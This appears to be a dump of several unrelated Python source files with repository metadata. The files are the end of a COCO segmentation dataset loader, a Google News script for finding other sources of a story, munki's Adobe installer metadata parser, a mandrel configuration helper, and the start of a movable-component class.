img_metadata = coco.loadImgs(img_id)[0]
path = img_metadata['file_name']
img = Image.open(os.path.join(self.root, path)).convert('RGB')
cocotarget = coco.loadAnns(coco.getAnnIds(imgIds=img_id))
mask = Image.fromarray(self._gen_seg_mask(cocotarget, img_metadata['height'],
img_metadata['width']))
# synchrosized transform
if self.mode == 'train':
img, mask = self._sync_transform(img, mask)
elif self.mode == 'val':
img, mask = self._val_sync_transform(img, mask)
else:
assert self.mode == 'testval'
mask = self._mask_transform(mask)
# general resize, normalize and toTensor
if self.transform is not None:
img = self.transform(img)
return img, mask
def __len__(self):
return len(self.ids)
def _gen_seg_mask(self, target, h, w):
mask = np.zeros((h, w), dtype=np.uint8)
coco_mask = self.coco_mask
for instance in target:
rle = coco_mask.frPyObjects(instance['segmentation'], h, w)
m = coco_mask.decode(rle)
cat = instance['category_id']
if cat in self.CAT_LIST:
c = self.CAT_LIST.index(cat)
else:
continue
if len(m.shape) < 3:
mask[:, :] += (mask == 0) * (m * c)
else:
mask[:, :] += (mask == 0) * (((np.sum(m, axis=2)) > 0) * c).astype(np.uint8)
return mask
def _preprocess(self, ids, ids_file):
print("Preprocessing mask, this will take a while." + \
"But don't worry, it only run once for each split.")
tbar = trange(len(ids))
new_ids = []
for i in tbar:
img_id = ids[i]
cocotarget = self.coco.loadAnns(self.coco.getAnnIds(imgIds=img_id))
img_metadata = self.coco.loadImgs(img_id)[0]
mask = self._gen_seg_mask(cocotarget, img_metadata['height'],
img_metadata['width'])
# more than 1k pixels
if (mask > 0).sum() > 1000:
new_ids.append(img_id)
tbar.set_description('Doing: {}/{}, got {} qualified images'. \
format(i, len(ids), len(new_ids)))
print('Found number of qualified images: ', len(new_ids))
with open(ids_file, 'wb') as f:
pickle.dump(new_ids, f)
return new_ids
@property
def classes(self):
"""Category names."""
return ('background', 'airplane', 'bicycle', 'bird', 'boat', 'bottle',
'bus', 'car', 'cat', 'chair', 'cow', 'diningtable', 'dog', 'horse',
'motorcycle', 'person', 'potted-plant', 'sheep', 'sofa', 'train',
'tv')
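# --- Illustrative usage (not from the original module): a sketch only, since it
# assumes the COCO 2017 images and annotations are already present under
# ~/.mxnet/datasets/coco. ---
if __name__ == '__main__':
    dataset = COCOSegmentation(split='val', mode='val')
    print('samples:', len(dataset))
    print('classes:', dataset.classes)
    img, mask = dataset[0]
    print('first sample loaded')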
| 40.582609
| 92
| 0.555817
| 4,395
| 0.941718
| 0
| 0
| 329
| 0.070495
| 0
| 0
| 948
| 0.203128
|
35fd4da34b0954ed2f821de46d87379191733efa
| 1,045
|
py
|
Python
|
find_other_news_sources.py
|
sr33/OtherNewsSources
|
17857381a5690d5e89d4a034f1fc60f61c2377dc
|
[
"MIT"
] | 10
|
2015-07-17T09:57:38.000Z
|
2020-05-24T20:09:20.000Z
|
find_other_news_sources.py
|
sr33/OtherNewsSources
|
17857381a5690d5e89d4a034f1fc60f61c2377dc
|
[
"MIT"
] | null | null | null |
find_other_news_sources.py
|
sr33/OtherNewsSources
|
17857381a5690d5e89d4a034f1fc60f61c2377dc
|
[
"MIT"
] | null | null | null |
# __author__ = 'sree'
import urllib2
from lxml import html
import requests
def get_page_tree(url=None):
page = requests.get(url=url, verify=False)
return html.fromstring(page.text)
def get_title(url=None):
tree = get_page_tree(url=url)
return tree.xpath('//title//text()')[0].strip().split(' -')[0]
def find_other_news_sources(url=None, title=None):
# Google forwards the url using <google_domain>/url?q=<actual_link>. This might change over time
forwarding_identifier = '/url?q='
if not title:
title = get_title(url=url)
parent_url_exclude = '-site:' + url
google_news_search_url = 'http://www.google.com/search?q=' + urllib2.quote(title) + parent_url_exclude + '&tbm=nws'
google_news_search_tree = get_page_tree(url=google_news_search_url)
other_news_sources_links = [a_link.replace(forwarding_identifier, '').split('&')[0] for a_link in
google_news_search_tree.xpath('//a//@href') if forwarding_identifier in a_link]
return other_news_sources_links
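# --- Illustrative note (not from the original module): this code targets
# Python 2 (urllib2); on Python 3 the equivalent helper is urllib.parse.quote.
# Example call (network access required; the URL below is made up):
#   for link in find_other_news_sources(url='https://example.com/some-article'):
#       print(link)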
| 40.192308
| 119
| 0.702392
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 215
| 0.205742
|
35fda7f9b73a414c879824f59fa81da72f267f5a
| 35,235
|
py
|
Python
|
code/client/munkilib/adobeutils/adobeinfo.py
|
Rippling/munki
|
115832687d4411ca825202ec82d9a27053fef7c8
|
[
"Apache-2.0"
] | 1
|
2021-10-06T12:56:14.000Z
|
2021-10-06T12:56:14.000Z
|
code/client/munkilib/adobeutils/adobeinfo.py
|
Rippling/munki
|
115832687d4411ca825202ec82d9a27053fef7c8
|
[
"Apache-2.0"
] | null | null | null |
code/client/munkilib/adobeutils/adobeinfo.py
|
Rippling/munki
|
115832687d4411ca825202ec82d9a27053fef7c8
|
[
"Apache-2.0"
] | null | null | null |
# encoding: utf-8
# Copyright 2009-2020 Greg Neagle.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# https://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""
adobeutils.adobeinfo
Created by Greg Neagle on 2017-01-06.
Utilities to get info about Adobe installers/uninstallers
"""
from __future__ import absolute_import, print_function
import os
import json
import sqlite3
from glob import glob
from xml.dom import minidom
from .. import osutils
from .. import pkgutils
def find_install_app(dirpath):
'''Searches dirpath and enclosed directories for Install.app.
Returns the path to the actual executable.'''
for (path, dummy_dirs, dummy_files) in os.walk(dirpath):
if path.endswith("Install.app"):
setup_path = os.path.join(path, "Contents", "MacOS", "Install")
if os.path.exists(setup_path):
return setup_path
return ''
def find_setup_app(dirpath):
'''Search dirpath and enclosed directories for Setup.app.
Returns the path to the actual executable.'''
for (path, dummy_dirs, dummy_files) in os.walk(dirpath):
if path.endswith("Setup.app"):
setup_path = os.path.join(path, "Contents", "MacOS", "Setup")
if os.path.exists(setup_path):
return setup_path
return ''
def find_adobepatchinstaller_app(dirpath):
'''Searches dirpath and enclosed directories for AdobePatchInstaller.app.
Returns the path to the actual executable.'''
for (path, dummy_dirs, dummy_files) in os.walk(dirpath):
if path.endswith("AdobePatchInstaller.app"):
setup_path = os.path.join(
path, "Contents", "MacOS", "AdobePatchInstaller")
if os.path.exists(setup_path):
return setup_path
return ''
def find_adobe_deployment_manager(dirpath):
'''Searches dirpath and enclosed directories for AdobeDeploymentManager.
Returns path to the executable.'''
for (path, dummy_dirs, dummy_files) in os.walk(dirpath):
if path.endswith("pkg/Contents/Resources"):
dm_path = os.path.join(path, "AdobeDeploymentManager")
if os.path.exists(dm_path):
return dm_path
return ''
def find_acrobat_patch_app(dirpath):
'''Attempts to find an AcrobatPro patching application
in dirpath. If found, returns the path to the bundled
patching script.'''
for (path, dummy_dirs, dummy_files) in os.walk(dirpath):
if path.endswith(".app"):
# look for Adobe's patching script
patch_script_path = os.path.join(
path, 'Contents', 'Resources', 'ApplyOperation.py')
if os.path.exists(patch_script_path):
return path
return ''
def get_payload_info(dirpath):
'''Parses Adobe payloads, pulling out info useful to munki.
.proxy.xml files are used if available, or for CC-era updates
which do not contain one, the Media_db.db file, which contains
identical XML, is instead used.
CS3/CS4: contain only .proxy.xml
CS5/CS5.5/CS6: contain both
CC: contain only Media_db.db'''
payloadinfo = {}
# look for .proxy.xml file dir
if os.path.isdir(dirpath):
proxy_paths = glob(os.path.join(dirpath, '*.proxy.xml'))
if proxy_paths:
xmlpath = proxy_paths[0]
dom = minidom.parse(xmlpath)
# if there's no .proxy.xml we should hope there's a Media_db.db
else:
db_path = os.path.join(dirpath, 'Media_db.db')
if os.path.exists(db_path):
conn = sqlite3.connect(db_path)
cur = conn.cursor()
cur.execute("SELECT value FROM PayloadData WHERE "
"PayloadData.key = 'PayloadInfo'")
result = cur.fetchone()
cur.close()
if result:
info_xml = result[0].encode('UTF-8')
dom = minidom.parseString(info_xml)
else:
# no xml, no db, no payload info!
return payloadinfo
payload_info = dom.getElementsByTagName('PayloadInfo')
if payload_info:
installer_properties = payload_info[0].getElementsByTagName(
'InstallerProperties')
if installer_properties:
properties = installer_properties[0].getElementsByTagName(
'Property')
for prop in properties:
if 'name' in list(prop.attributes.keys()):
propname = prop.attributes['name'].value.encode('UTF-8')
propvalue = ''
for node in prop.childNodes:
propvalue += node.nodeValue
if propname == 'AdobeCode':
payloadinfo['AdobeCode'] = propvalue
if propname == 'ProductName':
payloadinfo['display_name'] = propvalue
if propname == 'ProductVersion':
payloadinfo['version'] = propvalue
installmetadata = payload_info[0].getElementsByTagName(
'InstallDestinationMetadata')
if installmetadata:
totalsizes = installmetadata[0].getElementsByTagName(
'TotalSize')
if totalsizes:
installsize = ''
for node in totalsizes[0].childNodes:
installsize += node.nodeValue
payloadinfo['installed_size'] = int(int(installsize)/1024)
return payloadinfo
def get_adobe_setup_info(installroot):
'''Given the root of mounted Adobe DMG,
look for info about the installer or updater'''
info = {}
payloads = []
# look for all the payloads folders
for (path, dummy_dirs, dummy_files) in os.walk(installroot):
if path.endswith('/payloads'):
driverfolder = ''
media_signature = ''
setupxml = os.path.join(path, 'setup.xml')
if os.path.exists(setupxml):
dom = minidom.parse(setupxml)
drivers = dom.getElementsByTagName('Driver')
if drivers:
driver = drivers[0]
if 'folder' in list(driver.attributes.keys()):
driverfolder = driver.attributes[
'folder'].value.encode('UTF-8')
if driverfolder == '':
# look for mediaSignature (CS5 AAMEE install)
setup_elements = dom.getElementsByTagName('Setup')
if setup_elements:
media_signature_elements = setup_elements[
0].getElementsByTagName('mediaSignature')
if media_signature_elements:
element = media_signature_elements[0]
for node in element.childNodes:
media_signature += node.nodeValue
for item in osutils.listdir(path):
payloadpath = os.path.join(path, item)
payloadinfo = get_payload_info(payloadpath)
if payloadinfo:
payloads.append(payloadinfo)
if ((driverfolder and item == driverfolder) or
(media_signature and
payloadinfo['AdobeCode'] == media_signature)):
info['display_name'] = payloadinfo['display_name']
info['version'] = payloadinfo['version']
info['AdobeSetupType'] = 'ProductInstall'
if not payloads:
# look for an extensions folder; almost certainly this is an Updater
for (path, dummy_dirs, dummy_files) in os.walk(installroot):
if path.endswith("/extensions"):
for item in osutils.listdir(path):
#skip LanguagePacks
if item.find("LanguagePack") == -1:
itempath = os.path.join(path, item)
payloadinfo = get_payload_info(itempath)
if payloadinfo:
payloads.append(payloadinfo)
# we found an extensions dir,
# so no need to keep walking the install root
break
if payloads:
if len(payloads) == 1:
info['display_name'] = payloads[0]['display_name']
info['version'] = payloads[0]['version']
else:
if 'display_name' not in info:
info['display_name'] = "ADMIN: choose from payloads"
if 'version' not in info:
info['version'] = "ADMIN please set me"
info['payloads'] = payloads
installed_size = 0
for payload in payloads:
installed_size = installed_size + payload.get('installed_size', 0)
info['installed_size'] = installed_size
return info
def get_adobe_package_info(installroot):
'''Gets the package name from the AdobeUberInstaller.xml file;
other info from the payloads folder'''
info = get_adobe_setup_info(installroot)
info['description'] = ""
installerxml = os.path.join(installroot, "AdobeUberInstaller.xml")
if os.path.exists(installerxml):
description = ''
dom = minidom.parse(installerxml)
installinfo = dom.getElementsByTagName("InstallInfo")
if installinfo:
packagedescriptions = \
installinfo[0].getElementsByTagName("PackageDescription")
if packagedescriptions:
prop = packagedescriptions[0]
for node in prop.childNodes:
description += node.nodeValue
if description:
description_parts = description.split(' : ', 1)
info['display_name'] = description_parts[0]
if len(description_parts) > 1:
info['description'] = description_parts[1]
else:
info['description'] = ""
return info
else:
installerxml = os.path.join(installroot, "optionXML.xml")
if os.path.exists(installerxml):
dom = minidom.parse(installerxml)
installinfo = dom.getElementsByTagName("InstallInfo")
if installinfo:
pkgname_elems = installinfo[0].getElementsByTagName(
"PackageName")
if pkgname_elems:
prop = pkgname_elems[0]
pkgname = ""
for node in prop.childNodes:
pkgname += node.nodeValue
info['display_name'] = pkgname
if not info.get('display_name'):
info['display_name'] = os.path.basename(installroot)
return info
def get_xml_text_element(dom_node, name):
'''Returns the text value of the first item found with the given
tagname'''
value = None
subelements = dom_node.getElementsByTagName(name)
if subelements:
value = ''
for node in subelements[0].childNodes:
value += node.nodeValue
return value
def parse_option_xml(option_xml_file):
'''Parses an optionXML.xml file and pulls the items of interest, returning
them in a dictionary'''
info = {}
dom = minidom.parse(option_xml_file)
installinfo = dom.getElementsByTagName('InstallInfo')
if installinfo:
if 'id' in list(installinfo[0].attributes.keys()):
info['packager_id'] = installinfo[0].attributes['id'].value
if 'version' in list(installinfo[0].attributes.keys()):
info['packager_version'] = installinfo[
0].attributes['version'].value
info['package_name'] = get_xml_text_element(
installinfo[0], 'PackageName')
info['package_id'] = get_xml_text_element(installinfo[0], 'PackageID')
info['products'] = []
# CS5 to CC 2015.0-2015.2 releases use RIBS, and we retrieve a
# display name, version and 'mediaSignature' for building installs
# items. SAPCode is also stored so that we can later search by this
# key across both RIBS and HyperDrive installer metadata.
medias_elements = installinfo[0].getElementsByTagName('Medias')
if medias_elements:
media_elements = medias_elements[0].getElementsByTagName('Media')
if media_elements:
for media in media_elements:
product = {}
product['prodName'] = get_xml_text_element(
media, 'prodName')
product['prodVersion'] = get_xml_text_element(
media, 'prodVersion')
product['SAPCode'] = get_xml_text_element(media, 'SAPCode')
setup_elements = media.getElementsByTagName('Setup')
if setup_elements:
media_signature_elements = setup_elements[
0].getElementsByTagName('mediaSignature')
if media_signature_elements:
product['mediaSignature'] = ''
element = media_signature_elements[0]
for node in element.childNodes:
product['mediaSignature'] += node.nodeValue
info['products'].append(product)
# HD (HyperDrive) media for new mid-June 2016 products. We need the
# SAP codes, versions, and which ones are MediaType 'Product'. Support
# payloads seem to all be 'STI', and are listed as STIDependencies under
# the main product.
hd_medias_elements = installinfo[0].getElementsByTagName('HDMedias')
if hd_medias_elements:
hd_media_elements = hd_medias_elements[0].getElementsByTagName(
'HDMedia')
if hd_media_elements:
for hd_media in hd_media_elements:
product = {}
product['hd_installer'] = True
# productVersion is the 'full' version number
# prodVersion seems to be the "customer-facing" version for
# this update
# baseVersion is the first/base version for this standalone
# product/channel/LEID,
# not really needed here so we don't copy it
for elem in [
'mediaLEID',
'prodVersion',
'productVersion',
'SAPCode',
'MediaType',
'TargetFolderName']:
product[elem] = get_xml_text_element(hd_media, elem)
info['products'].append(product)
return info
def get_hd_installer_info(hd_payload_root, sap_code):
'''Attempts to extract some information from a HyperDrive payload
application.json file and return a reduced set in a dict'''
hd_app_info = {}
app_json_path = os.path.join(hd_payload_root, sap_code, 'Application.json')
json_info = json.loads(open(app_json_path, 'r').read())
# Copy some useful top-level keys, useful later for:
# - Name: display_name pkginfo key
# - ProductVersion: version pkginfo key and uninstall XML location
# - SAPCode: an uninstallXml for an installs item if it's a 'core' Type
# - BaseVersion and version: not currently used but may be useful once
# there are more HD installers in the future
for key in ['BaseVersion', 'Name', 'ProductVersion', 'SAPCode', 'version']:
hd_app_info[key] = json_info[key]
hd_app_info['SAPCode'] = json_info['SAPCode']
# Adobe puts an array of dicts in a dict with one key called 'Package'
pkgs = [pkg for pkg in json_info['Packages']['Package']]
hd_app_info['Packages'] = pkgs
return hd_app_info
def get_cs5_media_signature(dirpath):
'''Returns the CS5 mediaSignature for an AAMEE CS5 install.
dirpath is typically the root of a mounted dmg'''
payloads_dir = ""
# look for a payloads folder
for (path, dummy_dirs, dummy_files) in os.walk(dirpath):
if path.endswith('/payloads'):
payloads_dir = path
# return empty-handed if we didn't find a payloads folder
if not payloads_dir:
return ''
# now look for setup.xml
setupxml = os.path.join(payloads_dir, 'Setup.xml')
if os.path.exists(setupxml) and os.path.isfile(setupxml):
# parse the XML
dom = minidom.parse(setupxml)
setup_elements = dom.getElementsByTagName('Setup')
if setup_elements:
media_signature_elements = (
setup_elements[0].getElementsByTagName('mediaSignature'))
if media_signature_elements:
element = media_signature_elements[0]
elementvalue = ''
for node in element.childNodes:
elementvalue += node.nodeValue
return elementvalue
return ""
def get_cs5_uninstall_xml(option_xml_file):
'''Gets the uninstall deployment data from a CS5 installer'''
xml = ''
dom = minidom.parse(option_xml_file)
deployment_info = dom.getElementsByTagName('DeploymentInfo')
if deployment_info:
for info_item in deployment_info:
deployment_uninstall = info_item.getElementsByTagName(
'DeploymentUninstall')
if deployment_uninstall:
deployment_data = deployment_uninstall[0].getElementsByTagName(
'Deployment')
if deployment_data:
deployment = deployment_data[0]
xml += deployment.toxml('UTF-8')
return xml
def count_payloads(dirpath):
'''Attempts to count the payloads in the Adobe installation item.
Used for rough percent-done progress feedback.'''
count = 0
for (path, dummy_dirs, files) in os.walk(dirpath):
if path.endswith("/payloads"):
# RIBS-style installers
for subitem in osutils.listdir(path):
subitempath = os.path.join(path, subitem)
if os.path.isdir(subitempath):
count = count + 1
elif "/HD/" in path and "Application.json" in files:
# we're inside an HD installer directory. The payloads/packages
# are .zip files
zip_file_count = len(
[item for item in files if item.endswith(".zip")])
count = count + zip_file_count
return count
def get_adobe_install_info(installdir):
'''Encapsulates info used by the Adobe Setup/Install app.'''
adobe_install_info = {}
if installdir:
adobe_install_info['media_signature'] = get_cs5_media_signature(
installdir)
adobe_install_info['payload_count'] = count_payloads(installdir)
option_xml_file = os.path.join(installdir, "optionXML.xml")
if os.path.exists(option_xml_file):
adobe_install_info['uninstallxml'] = get_cs5_uninstall_xml(
option_xml_file)
return adobe_install_info
# Disable PyLint complaining about 'invalid' camelCase names
# pylint: disable=invalid-name
def getAdobeCatalogInfo(mountpoint, pkgname=""):
'''Used by makepkginfo to build pkginfo data for Adobe
installers/updaters'''
# look for AdobeDeploymentManager (AAMEE installer)
deploymentmanager = find_adobe_deployment_manager(mountpoint)
if deploymentmanager:
dirpath = os.path.dirname(deploymentmanager)
option_xml_file = os.path.join(dirpath, 'optionXML.xml')
option_xml_info = {}
if os.path.exists(option_xml_file):
option_xml_info = parse_option_xml(option_xml_file)
cataloginfo = get_adobe_package_info(dirpath)
if cataloginfo:
# add some more data
if option_xml_info.get('packager_id') == u'CloudPackager':
# CCP package
cataloginfo['display_name'] = option_xml_info.get(
'package_name', 'unknown')
cataloginfo['name'] = cataloginfo['display_name'].replace(
' ', '')
cataloginfo['uninstallable'] = True
cataloginfo['uninstall_method'] = "AdobeCCPUninstaller"
cataloginfo['installer_type'] = "AdobeCCPInstaller"
cataloginfo['minimum_os_version'] = "10.6.8"
mediasignatures = [
item['mediaSignature']
for item in option_xml_info.get('products', [])
if 'mediaSignature' in item]
else:
# AAMEE package
cataloginfo['name'] = cataloginfo['display_name'].replace(
' ', '')
cataloginfo['uninstallable'] = True
cataloginfo['uninstall_method'] = "AdobeCS5AAMEEPackage"
cataloginfo['installer_type'] = "AdobeCS5AAMEEPackage"
cataloginfo['minimum_os_version'] = "10.5.0"
cataloginfo['adobe_install_info'] = get_adobe_install_info(
installdir=dirpath)
mediasignature = cataloginfo['adobe_install_info'].get(
"media_signature")
mediasignatures = [mediasignature]
# Determine whether we have HD media as well in this installer
hd_metadata_dirs = [
product['TargetFolderName']
for product in option_xml_info['products']
if product.get('hd_installer')]
hd_app_infos = []
for sap_code in hd_metadata_dirs:
hd_app_info = get_hd_installer_info(
os.path.join(dirpath, 'HD'), sap_code)
hd_app_infos.append(hd_app_info)
# 'installs' array will be populated if we have either RIBS
# or HD installers, which may be mixed together in one
# CCP package.
# Acrobat Pro DC doesn't currently generate any useful installs
# info if it's part of a CCP package.
installs = []
# media signatures are used for RIBS (CS5 to CC mid-2015)
if mediasignatures:
# make a default <key>installs</key> array
uninstalldir = "/Library/Application Support/Adobe/Uninstall"
for mediasignature in mediasignatures:
signaturefile = mediasignature + ".db"
filepath = os.path.join(uninstalldir, signaturefile)
installitem = {}
installitem['path'] = filepath
installitem['type'] = 'file'
installs.append(installitem)
# Custom installs items for HD installers seem to need only HDMedias
# from optionXML.xml with a MediaType of 'Product' and their
# 'core' packages (e.g. language packs are 'non-core')
if hd_app_infos:
if 'payloads' not in cataloginfo:
cataloginfo['payloads'] = []
cataloginfo['payloads'].extend(hd_app_infos)
# Calculate installed_size by counting packages in payloads
# in these indexed HD medias. installed_size may exist already
# if this package contained RIBS payloads, so try reading it
# and default to 0. This will typically include several very
# small packages (language or regional recommended settings)
# which would not actually get installed. These seem to be
# no larger than a few MB, so in practice it increases the
# 'installed_size' value by only ~1%.
installed_size = cataloginfo.get('installed_size', 0)
for hd_payload in hd_app_infos:
for package in hd_payload['Packages']:
# Generally, all app installs will include 1-3 'core'
# packages and then additional language/settings/color
# packages which are regional or language-specific.
# If we filter this by including both unconditional
# installs and those which are language/region specific,
# we get a rough approximation of the total size of
# supplemental packages, as their equivalents for other
# languages are very close to the same size. We also
# get one included language package which would be the
# case for any install.
#
# Because InDesign CC 2017 is not like any other package
# and contains a 'Condition' key but as an empty
# string, we explicitly test this case as well.
if ('Condition' not in list(package.keys()) or
package.get('Condition') == '' or
'[installLanguage]==en_US' in
package.get('Condition', '')):
installed_size += int(package.get(
'ExtractSize', 0) / 1024)
# We get much closer to Adobe's "HDSetup" calculated
# install space requirement if we include both the
# DownloadSize and ExtractSize data
# (DownloadSize is just the zip file size)
installed_size += int(package.get(
'DownloadSize', 0) / 1024)
# Add another 300MB for the CC app and plumbing in case they've
# never been installed on the system
installed_size += 307200
cataloginfo['installed_size'] = installed_size
uninstalldir = (
'/Library/Application Support/Adobe/Installers/uninstallXml'
)
product_saps = [
prod['SAPCode'] for
prod in option_xml_info['products']
if prod.get('MediaType') == 'Product'
]
product_app_infos = [app for app in hd_app_infos
if app['SAPCode'] in product_saps]
# if we had only a single HD and no legacy apps, set a sane
# version and display_name derived from the app's metadata
if (len(product_app_infos) == 1) and not mediasignatures:
cataloginfo.update({
'display_name': product_app_infos[0]['Name'],
'version': product_app_infos[0]['ProductVersion'],
})
for app_info in product_app_infos:
for pkg in app_info['Packages']:
# Don't assume 'Type' key always exists. At least the
#'AdobeIllustrator20-Settings'
# package doesn't have this key set.
if pkg.get('Type') == 'core':
# We can't use 'ProductVersion' from
# Application.json for the part following the
# SAPCode, because it's usually too specific and
# won't match the "short" product version.
# We can take 'prodVersion' from the optionXML.xml
# instead.
# We filter out any non-HD installers to avoid
# matching up the wrong versions for packages that
# may contain multiple different major versions of
# a given SAPCode
pkg_prod_vers = [
prod['prodVersion']
for prod in option_xml_info['products']
if prod.get('hd_installer') and
prod['SAPCode'] == app_info['SAPCode']][0]
uninstall_file_name = '_'.join([
app_info['SAPCode'],
pkg_prod_vers.replace('.', '_'),
pkg['PackageName'],
pkg['PackageVersion']]) + '.pimx'
filepath = os.path.join(
uninstalldir, uninstall_file_name)
installitem = {}
installitem['path'] = filepath
installitem['type'] = 'file'
installs.append(installitem)
if installs:
cataloginfo['installs'] = installs
return cataloginfo
# Look for Install.app (Bare metal CS5 install)
# we don't handle this type, but we'll report it
# back so makepkginfo can provide an error message
# installapp = find_install_app(mountpoint)
# if installapp:
# cataloginfo = {}
# cataloginfo['installer_type'] = "AdobeCS5Installer"
# return cataloginfo
# Look for AdobePatchInstaller.app (CS5 updater)
installapp = find_adobepatchinstaller_app(mountpoint)
if os.path.exists(installapp):
# this is a CS5 updater disk image
cataloginfo = get_adobe_package_info(mountpoint)
if cataloginfo:
# add some more data
cataloginfo['name'] = cataloginfo['display_name'].replace(' ', '')
cataloginfo['uninstallable'] = False
cataloginfo['installer_type'] = "AdobeCS5PatchInstaller"
if pkgname:
cataloginfo['package_path'] = pkgname
# make some (hopefully functional) installs items from the payloads
installs = []
uninstalldir = "/Library/Application Support/Adobe/Uninstall"
# first look for a payload with a display_name matching the
# overall display_name
for payload in cataloginfo.get('payloads', []):
if (payload.get('display_name', '') ==
cataloginfo['display_name']):
if 'AdobeCode' in payload:
dbfile = payload['AdobeCode'] + ".db"
filepath = os.path.join(uninstalldir, dbfile)
installitem = {}
installitem['path'] = filepath
installitem['type'] = 'file'
installs.append(installitem)
break
if installs == []:
# didn't find a payload with matching name
# just add all of the non-LangPack payloads
# to the installs list.
for payload in cataloginfo.get('payloads', []):
if 'AdobeCode' in payload:
if ("LangPack" in payload.get("display_name") or
"Language Files" in payload.get(
"display_name")):
# skip Language Packs
continue
dbfile = payload['AdobeCode'] + ".db"
filepath = os.path.join(uninstalldir, dbfile)
installitem = {}
installitem['path'] = filepath
installitem['type'] = 'file'
installs.append(installitem)
cataloginfo['installs'] = installs
return cataloginfo
# Look for AdobeUberInstaller items (CS4 install)
pkgroot = os.path.join(mountpoint, pkgname)
adobeinstallxml = os.path.join(pkgroot, "AdobeUberInstaller.xml")
if os.path.exists(adobeinstallxml):
# this is a CS4 Enterprise Deployment package
cataloginfo = get_adobe_package_info(pkgroot)
if cataloginfo:
# add some more data
cataloginfo['name'] = cataloginfo['display_name'].replace(' ', '')
cataloginfo['uninstallable'] = True
cataloginfo['uninstall_method'] = "AdobeUberUninstaller"
cataloginfo['installer_type'] = "AdobeUberInstaller"
if pkgname:
cataloginfo['package_path'] = pkgname
return cataloginfo
# maybe this is an Adobe update DMG or CS3 installer
# look for Adobe Setup.app
setuppath = find_setup_app(mountpoint)
if setuppath:
cataloginfo = get_adobe_setup_info(mountpoint)
if cataloginfo:
# add some more data
cataloginfo['name'] = cataloginfo['display_name'].replace(' ', '')
cataloginfo['installer_type'] = "AdobeSetup"
if cataloginfo.get('AdobeSetupType') == "ProductInstall":
cataloginfo['uninstallable'] = True
cataloginfo['uninstall_method'] = "AdobeSetup"
else:
cataloginfo['description'] = "Adobe updater"
cataloginfo['uninstallable'] = False
cataloginfo['update_for'] = ["PleaseEditMe-1.0.0.0.0"]
return cataloginfo
# maybe this is an Adobe Acrobat 9 Pro patcher?
acrobatpatcherapp = find_acrobat_patch_app(mountpoint)
if acrobatpatcherapp:
cataloginfo = {}
cataloginfo['installer_type'] = "AdobeAcrobatUpdater"
cataloginfo['uninstallable'] = False
plist = pkgutils.getBundleInfo(acrobatpatcherapp)
cataloginfo['version'] = pkgutils.getVersionString(plist)
cataloginfo['name'] = "AcrobatPro9Update"
cataloginfo['display_name'] = "Adobe Acrobat Pro Update"
cataloginfo['update_for'] = ["AcrobatPro9"]
cataloginfo['RestartAction'] = 'RequireLogout'
cataloginfo['requires'] = []
cataloginfo['installs'] = [
{'CFBundleIdentifier': 'com.adobe.Acrobat.Pro',
'CFBundleName': 'Acrobat',
'CFBundleShortVersionString': cataloginfo['version'],
'path': '/Applications/Adobe Acrobat 9 Pro/Adobe Acrobat Pro.app',
'type': 'application'}
]
return cataloginfo
# didn't find any Adobe installers/updaters we understand
return None
# pylint: enable=invalid-name
if __name__ == '__main__':
print('This is a library of support tools for the Munki Suite.')
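# --- Illustrative snippet (added; not part of munki). The helpers above share one minidom
# pattern, wrapped by get_xml_text_element(): look elements up by tag name and concatenate
# the nodeValue of each child node. The XML string below is invented for the demo.
def _demo_get_xml_text(xml_string, tag):
    from xml.dom import minidom
    elements = minidom.parseString(xml_string).getElementsByTagName(tag)
    if not elements:
        return None
    return ''.join(node.nodeValue for node in elements[0].childNodes)
# _demo_get_xml_text('<Setup><mediaSignature>ABC123</mediaSignature></Setup>',
#                    'mediaSignature')  returns 'ABC123'; a missing tag returns None.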
| 44.657795 | 80 | 0.565319 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 12,245 | 0.347524 |
35fe055b65de9e34581ebd9b036ec7f195d41986 | 645 | py | Python | mandrel/config/helpers.py | gf-atebbe/python-mandrel | 64b90e3265a522ff72019960752bcc716533347f | ["MIT"] | null | null | null | mandrel/config/helpers.py | gf-atebbe/python-mandrel | 64b90e3265a522ff72019960752bcc716533347f | ["MIT"] | null | null | null | mandrel/config/helpers.py | gf-atebbe/python-mandrel | 64b90e3265a522ff72019960752bcc716533347f | ["MIT"] | null | null | null |
from .. import util
def configurable_class(setting_name, default_class_name=None):
def getter(self):
value = None
try:
value = self.configuration_get(setting_name)
except KeyError:
pass
if not value:
if not default_class_name:
return None
value = default_class_name
return util.get_by_fqn(value)
def setter(self, value):
if value is not None:
return self.configuration_set(setting_name, util.class_to_fqn(value))
return self.configuration_set(setting_name, None)
return property(getter, setter)
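# --- Usage sketch (added for illustration; the class and setting names below are
# hypothetical, and the real configuration base class comes from mandrel itself,
# providing configuration_get/configuration_set):
#
#   class StorageConfig(SomeMandrelConfig):
#       store_class = configurable_class('store_class', 'myapp.store.DiskStore')
#
#   cfg.store_class          # reads the setting and resolves the FQN to a class,
#                            # falling back to the default FQN when the setting is unset
#   cfg.store_class = Other  # stores the class back under its fully-qualified name
#   cfg.store_class = None   # clears the setting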
| 25.8 | 81 | 0.626357 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 |
35ff001cebfbaa2f16c6208ca4d5a99ce422a736 | 1,606 | py | Python | Components/MoveComponent.py | RuoxiQin/Unmanned-Aerial-Vehicle-Tracking | 49a0a32abcce42fc6bf9e71f5b098ec708373153 | ["Apache-2.0"] | 13 | 2018-06-16T12:52:18.000Z | 2021-08-14T02:43:24.000Z | Components/MoveComponent.py | RuoxiQin/Unmanned-Aerial-Vehicle-Tracking | 49a0a32abcce42fc6bf9e71f5b098ec708373153 | ["Apache-2.0"] | null | null | null | Components/MoveComponent.py | RuoxiQin/Unmanned-Aerial-Vehicle-Tracking | 49a0a32abcce42fc6bf9e71f5b098ec708373153 | ["Apache-2.0"] | 6 | 2019-06-20T21:06:01.000Z | 2021-08-14T02:43:28.000Z |
#!/usr/bin/python
#-*-coding:utf-8-*-
from Component import Component
class MoveComponent(Component):
'''This is the moveable component.'''
_name = 'MoveComponent'
def move(self,cmd):
        '''Input L, R, U, D or S to move the component or stop. Raises an exception if the move would leave the region.'''
